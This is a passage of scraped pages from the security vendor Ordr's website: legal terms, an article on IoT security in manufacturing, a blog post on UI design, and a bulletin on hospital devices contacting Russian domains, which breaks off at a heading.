Ordr has no control over, and assumes no responsibility for, the content, accuracy, privacy policies, or practices of or opinions expressed in any third party websites or by any third party that you interact with or find through the Website. In addition, Ordr will not and cannot monitor, verify, censor or edit the content of any third party site or service.
By using the Website, you release and hold us harmless from any and all liability arising from your use of any third party website or service.
If there is a dispute between users of the Website, or between users and any third party, you agree that Ordr is under no obligation to become involved. In the event that you have a dispute with one or more other users, you release Ordr, its officers, employees, agents, and successors from claims, demands, and damages of every kind or nature, known or unknown, suspected or unsuspected, disclosed or undisclosed, arising out of or in any way related to such disputes and/or our Website. If you are a California resident, you shall and hereby do waive California Civil Code Section 1542, which says: âA general release does not extend to claims which the creditor does not know or suspect to exist in his favor at the time of executing the release, which, if known by him must have materially affected his settlement with the debtor.âWill Ordr ever change the Website?
We are always trying to improve the Website, so it may change over time. We may suspend or discontinue any part of the Website, or we may introduce new features or impose limits on certain features or restrict access to parts or all of the Website. Weâll try to give you notice when we make a material change to the Website that would adversely affect you, but this isnât always practical. Similarly, we reserve the right to remove any Content from the Website at any time, for any reason (including, but not limited to, if someone alleges you contributed that Content in violation of these Terms), in our sole discretion, and without notice.
What if I want to stop using the Website?
Youâre free to do that at any time, by contacting us at info@ordr.net; please refer to our Privacy Policy, as well as these Terms of Use, to understand how we treat information you provide to us after you have stopped using our Website.
Ordr is also free to terminate (or suspend access to) your use of the Website for any reason in our discretion, including your breach of these Terms. Ordr has the sole right to decide whether you are in violation of any of the restrictions set forth in these Terms.
Provisions that, by their nature, should survive termination of these Terms shall survive termination. By way of example, all of the following will survive termination: any obligation you have to indemnify us, any limitations on our liability, any terms regarding ownership or intellectual property rights, and terms regarding disputes between us.What else do I need to know?
Warranty Disclaimer. Ordr does not make any representations or warranties concerning any content contained in or accessed through the Website, and we will not be responsible or liable for the accuracy, copyright compliance, legality, or decency of material contained in or accessed through the Website. We make no representations or warranties regarding suggestions or recommendations of services or products offered or purchased through the Website. Services purchased or offered (whether or not following such recommendations and suggestions) through the Website are provided âAS ISâ and without any warranty of any kind from Ordr or others (unless, with respect to such others only, provided expressly and unambiguously in writing by a designated third party for a specific product). THE WEBSITE AND CONTENT ARE PROVIDED ON AN âAS-ISâ BASIS, WITHOUT WARRANTIES OR ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION, IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT, OR THAT USE OF THE WEBSITE WILL BE UNINTERRUPTED OR ERROR-FREE. SOME STATES DO NOT ALLOW LIMITATIONS ON HOW LONG AN IMPLIED WARRANTY LASTS, SO THE ABOVE LIMITATIONS MAY NOT APPLY TO YOU.
Limitation of Liability. TO THE FULLEST EXTENT ALLOWED BY APPLICABLE LAW, UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE) SHALL ORDR BE LIABLE TO YOU OR TO ANY OTHER PERSON FOR (A) ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY KIND, INCLUDING DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, ACCURACY OF RESULTS, OR COMPUTER FAILURE OR MALFUNCTION, OR (B) ANY AMOUNT, IN THE AGGREGATE, IN EXCESS OF THE GREATER OF (I) $100 OR (II) THE AMOUNTS PAID BY YOU TO ORDR IN CONNECTION WITH THE WEBSITE IN THE TWELVE (12) MONTH PERIOD PRECEDING THIS APPLICABLE CLAIM, OR (III) ANY MATTER BEYOND OUR REASONABLE CONTROL. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF CERTAIN DAMAGES, SO THE ABOVE LIMITATION AND EXCLUSIONS MAY NOT APPLY TO YOU.
Indemnity. You agree to indemnify and hold Ordr, its affiliates, officers, agents, employees, and partners harmless for and against any and all claims, liabilities, damages (actual and consequential), losses and expenses (including attorneysâ fees) arising from or in any way related to any third party claims relating to (a) your use of the Website (including any actions taken by a third party on your behalf or at your direction), and (b) your violation of these Terms. In the event of such a claim, suit, or action (âClaimâ), we will attempt to provide notice of the Claim to the contact information we have for you (provided that failure to deliver such notice shall not eliminate or reduce your indemnification obligations hereunder).
Assignment. You may not assign, delegate or transfer these Terms or your rights or obligations hereunder, in any way (by operation of law or otherwise) without Ordrâs prior written consent. We may transfer, assign, or delegate these Terms and our rights and obligations without consent.
Choice of Law; Arbitration. These Terms are governed by and will be construed under the laws of the State of California, without regard to the conflicts of laws provisions thereof. Any dispute arising from or relating to the subject matter of these Terms shall be finally settled in San Francisco County, California, in English, in accordance with the Streamlined Arbitration Rules and Procedures of Judicial Arbitration and Mediation Services, Inc. (âJAMSâ) then in effect, by one commercial arbitrator with substantial experience in resolving intellectual property and commercial contract disputes, who shall be selected from the appropriate list of JAMS arbitrators in accordance with the Arbitration Rules and Procedures of JAMS. Judgment upon the award rendered by such arbitrator may be entered in any court of competent jurisdiction. Notwithstanding the
foregoing obligation to arbitrate disputes, each party shall have the right to pursue injunctive or other equitable relief at any time, from any court of competent jurisdiction. For all purposes of this Agreement, the parties consent to exclusive jurisdiction and venue in the state or federal courts located in, respectively, Santa Clara County, California, or the Northern District of California.
Miscellaneous. You will be responsible for paying withholding, filing, and reporting all taxes, duties, and other governmental assessments associated with your activity in connection with the Website, provided that Ordr may, in its sole discretion do any of the foregoing on your behalf or for itself as it sees fit. The failure of either you or us to exercise, in any way, any right herein shall not be deemed a waiver of any further rights hereunder. If any provision of this Agreement is found to be unenforceable or invalid, that provision will be limited or eliminated, to the minimum extent necessary, so that these Terms shall otherwise remain in full force and effect and enforceable. You and Ordr agree that these Terms are the complete and exclusive statement of the mutual understanding between you and Ordr, and that it supersedes and cancels all previous written and oral agreements, communications and other understandings relating to the subject matter of these Terms, and that all modifications to these Terms must be in a writing signed by both parties (except as otherwise provided herein). No agency, partnership, joint venture, or employment is created as a result of these Terms and you do not have any authority of any kind to bind Ordr in any respect whatsoever. You and Ordr agree there are no third party beneficiaries intended under this Agreement. -
Knowledge BaseIoT in Manufacturing: How OT/IT Convergence is Changing the Industry
…NSA describes it, the proliferation of “internet accessible operational technology.” This increase in the number of OT devices and systems that integrate with IT is the result of developments in…
IoT in Manufacturing: How OT/IT Convergence is Changing the Industry
7Min ReadThe Internet of Things (IoT) and other connected devices have been integral to the efficient operation of manufacturing lines for decades. Security of the production line was maintained by isolating equipment in what was known as the Purdue Methodologyâair gapping the network to keep it out of reach from threat actors. But as digital supply chains required hyperconnectivity to enable data exchange and greater levels of automation, the air gap was bridged, and manufacturers became vulnerable. A new Purdue Method is needed.
Fortunately, the means to protect connected devices on the production line is available. The following article offers insights and best practices to help guide an IoT security strategy for manufacturers.
The use of IoT in manufacturing continues to accelerate and evolve, as do the threats that come with the convergence of OT and IT. Recently, NSA and CISA released an alert warning manufacturers of potential security vulnerabilities in their OT systems. The alert cited an increase in the number of threats to OT assets including ransomware, spear phishing attacks, and the modification of control logic parameters, among others.
The primary driver of the emerging threats to OT is the unification of OT devices and systems with IT and IoT, or as NSA describes it, the proliferation of âinternet accessible operational technology.â This increase in the number of OT devices and systems that integrate with IT is the result of developments in technology, evolving features and capabilities, the movement of network access control vendors into OT, as well as mergers and acquisitions.
In this article, we look at some of the use cases for IoT in manufacturing, as well as the challenges and opportunities that manufacturers face at the intersection of OT/IT. But first, a couple of quick definitions.
What is IoT in manufacturing?
IoT in manufacturing is the subset of the industrial internet of things (IIoT) specific to manufacturing applications. IIoT is the network of sensors and devices that connect to computer systems and industrial software applications.
While IIoT refers to industries such as retail, utilities, or transport, IoT in manufacturing specifically applies to the Internet-connected sensors and devices used to track and produce goods more efficiently.
Both IoT in manufacturing and IIoT are themselves part of the broader internet of things (IoT), which comprises all the internet connected devices and sensors across domains. When people talk about IoT in practice, however, theyâre typically referring to the consumer applicationsâsuch as smart home devicesâso weâll stick to using the term IIoT for sake of clarity.
What is operational technology (OT)?
Operational technology (OT) consists of hardware and software components that monitor, control, and create changes in industrial equipment, devices, assets, processes, or events. OT technology systems may control industrial elements such as engines, conveyors, valves, or machines that are directly connected to the manufacturing process.
While OT systems were once commonly siloed from IT (or at least thought of as distinct from IT), the present trend is toward more integration of IT and OT systems. Three primary factors are driving this convergence of IT/OT:
- Increased reliance on/availability of remote operations and monitoring
- Outsourcing OT asset management and/or maintenance
- Decentralized workforces
The trend toward more unified OT/IT systems and greater IoT connectivity in manufacturing brings new capabilities and control for manufacturers, but also some risks. In the next section, weâll explore some IoT in manufacturing use cases, benefits and challenges, as well as some of the ways manufacturers can mitigate these risks.
Use cases: IoT in Manufacturing
The digital transformation of the manufacturing industry is changing the way production environments and supply chains work by improving efficiencies, automating processes, and adding intelligence.
But challenges accompany these opportunities, and manufacturers will need a strategy if they are to successfully capitalize on these benefits without compromising security or efficiency. Before we look at some specific use cases, itâs important to consider some of the needs manufacturers will face as IT/OT continue to converge:
- Visibility â Decisions about which OT devices and systems will be used are increasingly being made by multiple stakeholders in the supply chain. Manufacturers need visibility into all of these devices, as well as a system for asset discovery, classification, and segmentation for those with security vulnerabilities.
- Compliance â IoT, IT, and OT compliance depends on navigating an increasingly complex system of regulations. Understanding which devices are governed by each specific set of standards can help manufacturers cultivate robust security and remain in compliance.
- Efficiency â Aging devices put manufacturers at risk of losing efficiency as operating systems become obsolete or outdated. Recognizing which devices can still be secured can increase their longevity and avoid downtime.
- Intellectual property â As the number of attacks on OT and IoT devices continues to increase, manufacturers are at increased risk for theft of intellectual property. Manufacturers need a strategy for identifying business-critical devices and flagging abnormal behavior in order to protect their most valuable assets.
Manufacturers already rely on IoT devices and connectivity to drive production, quality control, and machine utilization, and additional use cases continue to evolve as OT/IT merge. These include the rise of predictive maintenance, real-time monitoring, remote management, and the collection of consumer insights.
Predictive maintenance
With the aid of sensors and the increase in data from manufacturing equipment, companies can now detect and predict failure before it occurs. For example, an analytical model may find that a machine has a high probability of failing when it breaches a specific temperature threshold. With this information, the monitoring applications can alert the machine operators when the event occurs, and they can then promptly replace it before causing larger issues with production.
According to Fortune Business Insights, the global market for predictive maintenance is expected to grow at a CAGR of 29.8% through 2026. That makes predictive maintenance one of the most rapidly expanding aspects of IIOT technology.
Monitoring in real time
Anyone in the production process can have access to data in real-time, which means anticipating and rapidly responding to changes or incidents that may impact production. Ultimately, this kind of real-time monitoring helps prevent down time and speeds up production.
Remote management
IIoT connected devices and digitally controlled machinery allow for fully remote operation of a production line. Many businesses choose a hybrid approach, in which some parts of the production line are automated and/or remotely controlled, with others operated by humans. Remote management has become more prevalent now that workforces are becoming less centralized.
Supply chain asset management and tracking
IIoT devices can help businesses understand how different parts of the supply chain are operating by tracking and monitoring how both raw materials and finished products move through the different production and transportation processes. This can not only help understand the overall state of production, but also glean insights into areas that could be optimized or costs that could be reduced.
For example, a complex supply chain may receive raw materials from numerous different vendors. A backup in just one of these deliveries can cause a bottleneck in production and cause expensive delays. By tracking how all materials are moving through the organization, management can quickly understand exactly where the issue is and make necessary adjustments to resolve it before causing larger delays.
Digital twins
Digital twins are computer-modeled simulations of a physical object or process. For example, a 3-D model of a building is a digital twin of the actual facility. While traditionally used to plan the structure and characteristics of a physical manufactured product, a digital twin can be used in conjunction with IoT systems to map out the digital representation of a production line to test and simulate changes to the manufacturing processes. Digital twins can also be used to mirror processes and model diagnostics.
For example, a business may want to understand the effect of changing the speed of a specific process. Using a digital twin and data from IIoT sensors, it could rather run a computer simulation to understand the impact of the speed change on the rest of the production line.
Building and operational systems
Manufacturing environments include a variety of operational technologies and devices, including HVAC, surveillance, access control, and energy systems. IIoT systems can be added to these to monitor their status and even adjust them remotely.
By doing so, these operational technologies can become intertwined with the broader supply chain and digital models. For instance, the climate systems may have an effect on the quality of the production process and therefore that data can be combined with the machinery data to run predictive maintenance and other types of models that may otherwise be difficult without the environmental context.
Collecting consumer insights
Manufacturers can use connected tools to gather data on consumer usage and track demand patterns. As a result, business managers remain agile and able to adjust the product to stay ahead of these trends. This increased responsiveness allows even large companies to be nimble and maximize customer satisfaction.
Challenges to IIoT in manufacturing
The merging of OT and IT technologies, as well as the increased accessibility of IoT devices present manufacturers with opportunities to minimize disruptions, streamline production, remotely access and monitor data, and ultimately drive revenue. But there are other considerations that manufacturers must take into account if they are to fully realize all the potential that OT, IT, and IoT offer.
Security & threat protection
According to Gartner, 75% of all OT security solutions will be provided by multifunction platforms that integrate with IT by 2025. With the exponential growth of connected devices in manufacturing facilities, these IIoT devices create an expanded attack surface. Threat prevention will become even more important as more OT devices interface with IT.
The threat of attacks has far reaching implications for manufacturers: in addition to disrupting production processes, attacks can also impact revenue andâin the worst-case scenarioâcompromise employee safety on the manufacturing floor. The security of these devices is critical to maximize uptime and optimize manufacturing processes, particularly as many remain in service for years and may become more vulnerable to attacks as they age.
Asset management
Manufacturers have an increasingly large inventory of assets to discover, evaluate, classify, and manage. The proliferation of IoT-accessible OT devices will only increase as the number of decision-makers in the supply chain expands, remote management of facilities and processes becomes more prevalent, and workforces become less centralized. Knowing exactly which assets are vulnerable is critical for providing adequate security measures and for maintaining production processes.
Operational resilience
According to a recent Gartner Risk Management Survey, one of the most common risk priority areas identified by respondents is the need for improved operational resilience for OT systems. That means understanding risks, anticipating potential disruptions, and planning for business continuity in the event of an incident, attack, or other breakdown in the production process. As the number of internet accessible OT devices increases, planning for operational resilience will become more complex.
Regulatory compliance
The patchwork of regulations governing OT/IT/IOT devices can be particularly challenging for manufacturers, and this problem will only continue as more and more devices and processes are integrated into the IIOT. Being able to map each device or component to the correct regulations plays a critical role in maintaining security and meeting regulatory requirements.
Secure all your connected devices
Manufacturing companies are embracing the convergence of IT and OT in hopes of capitalizing on the benefits brought by internet accessible OT devices. These benefits include more control over production processes, access to real-time data from remote locations, the ability to decentralize their workforce, and improved efficiencies that drive revenue growth.
As more OT devices become IoT-compatible, and as OT and IT security protocols continue to merge, manufacturers should have a plan for discovering and assessing all of their connected devices, including those used throughout their supply chains.
Most importantly, these devices must be evaluated and secured against the growing threat of security breaches. Ordr Systems Control Engine (SCE) can enable visibility and security of all your connected manufacturing devices. Try a demo of Ordr to learn how to keep your manufacturing devicesâand the data they collect and shareâsafe and secure.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?
-
BlogDesign Thinking â How to Make Complex Data, Simply Useful
…insights in real-time vs. waiting for a user to “ask” for data using a query. In our view, the solution would come from a comprehensive understanding of the intersection between…
Security Strategy
Design Thinking â How to Make Complex Data, Simply Useful
8Min ReadBy Pandian Gnanaprakasam
Introduction
As Ordr has gained momentum over the years, the breadth and depth of our data lake have exponentially grown, with more customers adopting Ordr and extending our solution to protect more parts of their environments. More customers and more departments of each customerâs environment mean more devices, which means more data being ingested to our platform. The growth of our data lake can also be attributed to more external inputs as we increasingly take in new sources of device context data to provide deeper insights and help our customers understand risk.
The rate of data growth we have seen creates unique challenges on the visualization side. Recently we paused to think about how our solution could better organize and present vast amounts of rich analytical data in a way that is both accessible and valuable for our users. It is truly an art indeed on how to balance the desire for simplicity with the appetite for the rich context that goes with it.
As our user base expands to new roles and personas, the product must adapt to different outcomes relevant to each user. Each userâs level of expertise and area of interest may vary, and workflows must cater to these users seamlessly. A product must meet the needs of different roles without the need to fork and build a dedicated version to satisfy the diverse needs of each user. A daunting task is less often discussed but is nevertheless critical to maximizing value for users.
With full awareness of our challenge, we set off to radically improve how we present our ever-increasing data in the most impactful, simple way to our expanding universe of users.
The Approach
As part of our product design process, we decided on an iterative approach called âdesign thinking,â a process defined as:
A bottom-up, non-linear, team-based iterative process that seeks to understand and empathize with users deeply, challenge existing assumptions, redefine problems, and brainstorm innovative solutions to prototype and test with customers.
Design thinking gave us a framework of 5 stages that include:
Empathize > Define > Ideate > Prototype > Test
With the design thinking framework, we set up a series of workshops and enrolled a range of users from our customers and prospects representing a variety of user roles to provide us both depth and breadth of insights and feedback we needed to collect requirements.
We started the process by asking our users the simple question:
How can we design a better user experience to make the data we provide in Ordr simple to understand and valuable for you and your role?
Some of the key requirements we heard from our design partners included:
- Organize information to fit my role and help me filter out the noise so I can focus on the information I need.
- Surface insights most relevant to my role and make them clear. Insights are the road signs that help me make decisions as I look at data.
- Allow me to âshapeâ and organize data to fit my needs in a fast and fluid way.
- Help me maintain the context of my data so I donât âlose my placeâ as I move around the application.
- Let me see different views so I can analyze data from different perspectives and uncover insights that might otherwise be missed.
- Prioritize content over color to me understand the structure of my data without unnecessary visual distractions.
The New Model Emerges
A key takeaway from the workshops was understanding that one userâs noise is often another userâs signal. It was clear that the new model needed to present data in a simple, customizable way without sacrificing the impact or richness of the data.
A query language approach is a good option, but it could not address the signal-to-noise problem without impacting other user requirements we had gathered during the workshops. For a query language approach to be successful, a user needs to know what theyâre looking for and needs to become proficient in the new syntax and semantics of the language. This impacts adoption and time to value â two things we were not willing to sacrifice.
Our analytics engine is rooted in the foundational principle of surfacing a constant stream of prioritized insights in real-time vs. waiting for a user to âaskâ for data using a query. In our view, the solution would come from a comprehensive understanding of the intersection between increasing data richness and a variety of UI/UX information retrieval approaches working together to achieve the desired result.
Pillars of the Model
From our learnings in the workshops, we defined the following seven pillars that guided the design of the UI/UX presentation model.
PILLAR 1: Create a clear consolidated experience for each role
Our users have distinct roles, backgrounds, traits, abilities, and dispositions. We expect this diversity will continue to expand and increase in complexity.
Scoping data coming into the UI based on a user role allows us to reduce the less relevant data (noise) and deliver a clean baseline of data (signal) for each user. With this in mind, we established a persona-based user experience, which requires filtering data from the data lake for a specific role and persona.
Persona-based filtering is easier said than done. The whole platform needs to run dynamic queries in the backend to customize itself on the fly. For example:
- An inventory and asset management workflow requires data on devices and relevant vulnerabilities.
- A security incident response workflow requires data on the latest alarms across all assets.
- A forensics workflow requires data on traffic flows and patterns.
For example, we designed a user role for Healthcare Technology Management (HTM) that switches the entire UI dashboard and shows only data relevant to their role and daily workflow needs.
The UI adapts to these wildly diverse use cases and data requirements while catering to each userâs role.
PILLAR 2: Provide each user with contextual insights
Insights offer users top-level guidance like a road sign to separate the signal from the noise. Our model uses computationally intensive methods to surface insights in real-time, tailored explicitly for each role.
Each user requires a different dashboard and depth of context for the workflow they are interested in to be presented as top-level data.
PILLAR 3: Allow each user to shape data relevant to their role
Data Shaping controls the scope of data allowing each user to either explore data or âset and forgetâ a view for specific workflows. Data Shaping reduces clutter by reducing the number of devices displayed, making it easier to slice and dice the data more cleanly.
For example, in our system, setting the data shaper to a specific location only shows the devices in that location and associated data. Whether the user is in a sub-section of the product or moving across the hundreds of panels, they see only data relevant to that location.
Another example is a radiology technician using the shaper to focus on radiology-related devices. The entire product today customizes itself to radiology devices across all panels and screens. That radiology technician can now work on security, traffic analytics, vulnerability management, risk management, or policy provisioning without being shown the ânoiseâ created by other non-radiology devices.
PILLAR 4: Enable context-aware search across the entire UI
When the data set accumulates over time into several terabytes, launching a generic search that takes more processing time to respond back after several seconds does not usually present a good user experience. But tailoring the search function to each panel where the user is currently focused on reduces the data set to search and narrowing search parameters resulting in faster query time as well as better user experience.
As an example, in each table and each panel, search parameters differ as follows:
- Device detail table provides a search function on thousands of device attributes.
- The security alarm panel provides a search capability using alarm categories as parameters.
- The traffic analytics panel provides a search capability related to traffic/flow parameters.
- The application panel provides a search based on destination URL or application protocol details like port numbers.
- Search enabled in every column of a table with parameters within that column for further quick deep dive of data.
Implementing context-aware search in each panel when there are hundreds of panels is a huge undertaking. But now that it is designed in, it is well worth the effort to minimize complexity for the user.
PILLAR 5: Allow users to easily share findings and views
Once a user has reduced a view to a list of devices that need further action, that view, including the entire context, can be easily shared with others as a URL. Another user clicking that URL comes back to the same screen with a list of devices without having to search and filter for attributes. This is a perfect example of how context gets naturally amplified with the power of sharing. Our system today allows users to save the context at various places in the navigation workflow and share it with their colleagues.
PILLAR 6: Allow users to enforce policies quickly without losing context
The action framework allows users to take quick action on any device, alarm, or vulnerability without losing context in the UI. For example, today with this release, a user can identify a list of vulnerable devices and move that complete list to a quarantine VLAN with a single click. Another example is too easily clear a series of alarms associated with devices that have the same make and model with one click. Invoking an action that requires multiple steps in action sequence right within the context without losing focus is critical to get workflows accomplished quickly.
PILLAR 7: Allow users to define their own region/location for easy aggregation
Ordr gathers location information from various sources including switches, access points, and network management systems. Device location is extremely granular in Ordr and is helpful to track a device as it moves through an organization or locates a device that has gone missing. It is critical to know exactly where a device that is affected by malware/ransomware is connected in the network (switch/port or AP/SSID or VPN (Virtual Private Network) or external).
But for manageability purposes, users want to use location to view all devices in a specific region, site, or location within that site. A location means something different from user to user, so customization is critical. The need to present data based on business function was a key driver for this, and it avoids all the clutter. For example, a user responsible for the Phoenix division can use location to focus on the devices in the Phoenix location only and not have to see devices in other locations. Our ability to aggregate micro-locations into administrative regions is very well received by our customers, given the distributed nature of the various hospital chains as well as the continuous changes in organizational hierarchy due to mergers and acquisitions.
Combining the Pillars
Ordr provides users with details on over a thousand attributes for each device. Attributes include details such as device OS, software stack, vulnerabilities, where the device connects from, connection methods, what the device communicates with internally and externally, risks based on behavior, context information from various tools, and users who have logged into the device.
Ordr is indeed a complex and dynamic system with vast amounts of data and potentially limitless insights. Using all seven pillars in combination, we believe our approach dramatically improves the signal for each user and does so in the context of their specific workflows to ensure they can use our platform and insights efficiently. This platform approach also supports our quest to make the complex problem of securing every connected device simple.
We recently launched Ordr 8 Clinical Defender with persona-based workflows designed for healthcare HTM users. With this new release, we applied the pillar framework above and created a foundation for a scalable platform that will produce many persona-based workflows operating on a single customizable and robust backend data set.
We received some excellent feedback as we shared our latest release and here are some of the things we heard:
“It is refreshing to work with a vendor that listens and empathizes with issues and pain points from customers. It’s exciting to see the rubber meet the road regarding suggestions and requests.”
“Loved what I saw in the review of new GUI.”
“Data shaper simplifies my current operation dramatically.”
“I like simplified search and its’ consistency throughout the product.”
“Location-based shaper is huge both for remote clinic management and for M&A (Mergers & Acquisitions) situations.”
Moving forward, we will keep working with our customers and prospects as design partners in this âdesign thinkingâ framework to continually evolve our platform. In the end, it is all the constant customer feedback that makes Ordr an excellent product.
We will be back soon with more updates on how the Ordr platform continues to evolve.
Pandian Gnanaprakasam
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Ciscoâs multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a masterâs degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?
-
BlogUnderstanding The Threat of Device Communications to Russia
…the least number of Russian URLs compared the devices listed above. Like the devices above, many of these devices provide critical functions in healthcare environments and although they communicate with…
Security Bulletin
Understanding The Threat of Device Communications to Russia
8Min ReadBy Pandian Gnanaprakasam
As the war in Ukraine broke out in late Feb, security teams around the globe took notice. Russia has long been a focus in the fight against cybercrime, and their aggression raised concerns to new levels with fears that cyberattacks could increase with a focus on the US and other western countries. On March 21, 2022, President Biden confirmed the rising concerns with a statement warning of a potential increase in Russian cyber activity targeting the US, allies, and partners. As organizations across the globe were taking steps to improve cyber defenses, we heard from many of our customers asking what Ordr could do to help improve security, threat prevention, and the ability to monitor their environments. A primary requirement was the ability to identify devices in their environments that had communications with potentially malicious Russian sites.
By continuously analyzing network data, Ordr uncovers all connected device communications within an organization as well as communications to external sites. We also assess the risk for these communications and provide that insight to every customer in our UI. To make these insights a little easier to access, we created a focused report that our customers could run to get a quick view of the exact flow level details of medical devices communicating with Russian sites and assess the risk. You can learn more about the report in this video:
While our customers could collect some of this data from various tools across their environment, only Ordr combines communication insights with device context. This triangulation methodology from multiple sources helps them understand the risk of communication and provides them with the details needed to pinpoint the device at risk and quickly craft the proper response to eliminate the threat.
Helping Everyone Understand the Risk
Ordr’s continuous analysis of network data and the report highlighting communications to Russia is available to all Ordr customers, providing necessary details to help them understand and quickly respond to potential threats. We also wanted to share our insights beyond Ordr’s customers to help others understand the potential risk to their environment.
The threats uncovered below focus on medical devices; however, these threats are not limited to just medical devices or the healthcare industry. Attackers target connected devices in all industries, including manufacturing, financial services, retail, and utilities. Attacks not only target medical devices but also operational technology (OT) devices such as HVAC systems, elevator controls, and connected cameras that are common across all industries. Many of these devices are critical to business operations even if it seems there is no direct connection, and a successful breach could have a significant impact. For example, an attack that takes an HVAC system offline could create unsafe conditions in the emergency ward and hamper patient care.
Before getting into the details of our findings, here’s an extremely brief overview of how Ordr works and some of the details we uncover for each device:
Device Insights Provided by Ordr
Ordr analyzes data collected from multiple points in the network to discover every connected device. We also uncover details to accurately classify every device and identify devices with vulnerabilities and potential threats. With our approach to collecting and analyzing network data we provide granular device insights without the need for agents or scanning and no impact on device operations.
Ordr insights help customers understand the exact devices connected in their environment, how those devices fit into the organization, and their potential risk. Ordr device details include:
- MAC Address â Important detail but identifying a device by its MAC alone can be limiting and misleading.
- IP Address â Since IP addresses can change, Ordr provides a historical view of a device’s IP addresses.
- Operating System â Helps to identify devices running an outdated or unpatched OS.
- Device Profile – Includes the manufacturer and model.
- Device Group â How the organization has grouped the device and its role in the environment (e.g., medical, mobile, office equipment, facilities).
- Device Type â Details including exact model number and firmware version to understand specific threats that may impact the device.
- Device Category â The type of device (e.g., CT scanner, infusion pump, patient monitor)
- Device Location â The exact physical and network location including the switch/port or access point/SSID the device connects to.
Communication Insights Provided by Ordr
Ordr also uncovers internal and external communication insights for each device by analyzing network data. This post focuses specifically with devices communicating with Russian sites but could also be used to identify communications with other restricted or high-risk countries. Ordr insights specific to devices communicating with external sites include:
- Destination IP – IP address of the site communicated with.
- Destination Domain Name – Domain name of the site communicated to.
- Destination City – Approximation of the site’s city. NOTE: Obfuscation techniques will impact accuracy (e.g., The Onion Router (Tor), VPN, etc.).
- URL – Complete the URL of the communication.
- URL Category – Category of the site (e.g., gaming, shopping, advertising, government, military, etc.).
- Reputation score 1 – URL reputation derived from a leading threat feed.
- Reputation score 2 – URL reputation derived from another leading threat feed.
- Receive Bytes – Number of bytes received by devices from the site.
- Transmit Bytes – Number of bytes transmitted to the site from devices.
- Last Activity – Timestamp of the last activity from devices to or from the site.
- Incident Type â Classification of the destination site (e.g., malicious URL, SPAM URL, etc.).
- Incident Score â Determined by aggregating multiple factors of device communications
- Aggregate Score – Determined by aggregating multiple factors of a device and its communications (e.g., vulnerabilities based on OS version, east-west communication analyzed using IDS signatures, external communication with malicious websites, etc.).
- Risk State – Overall assessment of device risk and potential impact to the organization (i.e., Critical, High, Medium, Low).
Ordr Analysis and Findings
For the insights that follow, the Ordr platform performed deep analysis on data aggregated and anonymized from 50 large health care chains, each consisting of multiple hospitals. The details below focus on medical devices used in healthcare settings such as infusion pumps, patient monitors, EEG/ECG, MRI/CT scanners, X-Rays, ultrasounds, medical gateways, medical workstations running medical apps, medical servers used to process and store patient data, and other connected device in the clinical setting delivering patient care. As mentioned previously, these threats are not limited to healthcare devices or the healthcare industry.
The goal of this analysis is to shed light on the potential threats so that organizations across all industries can be better prepared and take proper steps to secure their environments.
NOTE ON METHODOLOGY
- All data was aggregated and anonymized before analysis. None of the following details pertain to a specific customer, manufacturer, or device.
- Network Time Protocol (NTP) is a required service, and some devices may have legitimate reasons to communicate with Russian hosted NTP servers. Communications to Russian NTP sites have been removed from this analysis.
Top Russian Domains by Traffic
The first analysis highlights Russian domains that were identified for sustaining the highest levels of traffic into and out of the organizations we analyzed. While these domains may look somewhat benign, each may have the potential to be used to distribute malware or perform other malicious activities. Many of these sites are known to generate intrusive online ads and collect personal information. Device communications to any of these domains should be scrutinized to determine if communication is required and expected.
- *.yandex.ru
- *.ssp.rambler.ru
- ssp.adriver.ru
- sm.rtb.mts.ru
- *.rutarget.ru
- counter.yadro.ru
Devices Communicating with the Largest Number of URLs
The next analysis identifies device types that have communications with the largest number of Russian URLs. Many of these devices perform critical functions in healthcare environments and we can infer these types of devices are top targets for attackers.
Devices Communicating with the Smallest Number of URLs
The following medical device types have communications with the least number of Russian URLs compared the devices listed above. Like the devices above, many of these devices provide critical functions in healthcare environments and although they communicate with fewer Russian URLs, this activity should still be scrutinized to determine if communications are required and expected.
- Video Digitizer Recorder
- Coagulation Meter
- Perimetry System
- Blood Gas Analyzer
- Radio Fluoroscopy
- Surgical System
- X-ray Volume Imaging
- MR Image Analysis System
- Mobile X-ray System
- Molecular Diagnostics System
- ECG
- Anesthesia Cart
- Hematology Analyzer
- Digital Radiography System
- EEG
- PET/CT System
- Computed Tomography
- PET Scanner
- Patient Monitoring
- Mammography
- MRI Analyzer
- Dental X-ray System
- X-ray System
- SPECT System
Devices with the Most Received Data on a per Device Basis
Focus using our analysis on individual devices, the following details highlight the device types with the most amount of data received from Russian sites per device. Even if outbound communication is blocked by a firewall, the fact that these devices are receiving this volume of data from Russian sites should be of concern, and communication should be scrutinized to determine if communications are required and expected.
Device Category (Received bytes per device)
- CT Scanner (700K)
- Infusion Pump (160k)
- Medical Workstations (95K)
- X-Ray (47K)
- CT Scanner (21K)
- Hematology (19K)
- PACS (22K)
- Radiotherapy (7K)
- Ultrasound (5K)
Device Categories with the Most Received Data
Since a single organization may have multiple units of each device, we aggregated and analyzed device data to highlight the device categories with the most amount of data received from Russian sites. As with the other categories these devices provide critical functions in healthcare environments.
- EEG Workstation
- Ultrasound Image Management
- Infusion Pump
- Glucose Monitor
- Medical Workstation
- EHR Workstation
- PACS Workstation
Device Categories with the Most Transmitted Data
